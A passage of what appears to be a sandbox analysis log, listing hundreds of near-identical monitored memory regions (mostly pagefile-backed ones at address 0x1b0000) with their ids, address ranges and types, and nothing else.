"pagefile_0x00000000001b0000" filename = "" Region: id = 11020 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11021 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11022 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11023 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11024 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11025 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11026 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11027 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11028 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11029 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11030 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11031 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11032 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11033 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11082 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11083 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11084 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11085 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11086 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11087 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11088 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11089 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11090 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11091 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11092 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11093 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11094 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11095 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11096 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11097 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11098 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11099 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11100 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11101 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11102 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11103 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11104 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11105 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11106 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11107 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11108 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11109 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11110 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11111 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11112 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11113 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11114 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11115 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11116 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11117 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11118 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11119 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11120 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11121 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11122 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11123 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11124 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11125 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11126 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11127 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11128 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11129 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11130 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11174 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11175 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11176 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11177 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11178 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11179 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11180 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11181 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11182 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11183 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11184 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11185 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11186 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11187 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11188 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11189 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11190 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11191 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11192 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11193 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11194 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11195 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11196 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11197 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11198 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11199 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11200 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11201 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11202 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11203 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11204 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11205 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11206 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11207 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11208 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11209 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11210 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11249 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11250 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11251 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11252 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11253 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11254 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11255 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11256 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11257 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11258 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11259 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11260 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11261 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11262 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11263 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11264 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11265 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11266 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11267 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11268 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11269 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11270 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11271 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11272 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11273 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11274 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11275 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11276 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11277 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11278 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11279 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11280 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11281 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11282 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11283 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11284 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11285 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11286 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11287 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11288 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11289 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11290 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11291 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11292 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11293 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11294 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11340 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11341 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11342 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11343 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11344 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11345 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11346 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11347 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11348 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11349 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11350 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11351 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11352 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11353 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11354 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11355 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11356 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11357 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11358 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16991 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16992 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16993 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 16994 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16995 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16996 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16997 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16998 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16999 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17000 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17001 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17002 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17003 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17004 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 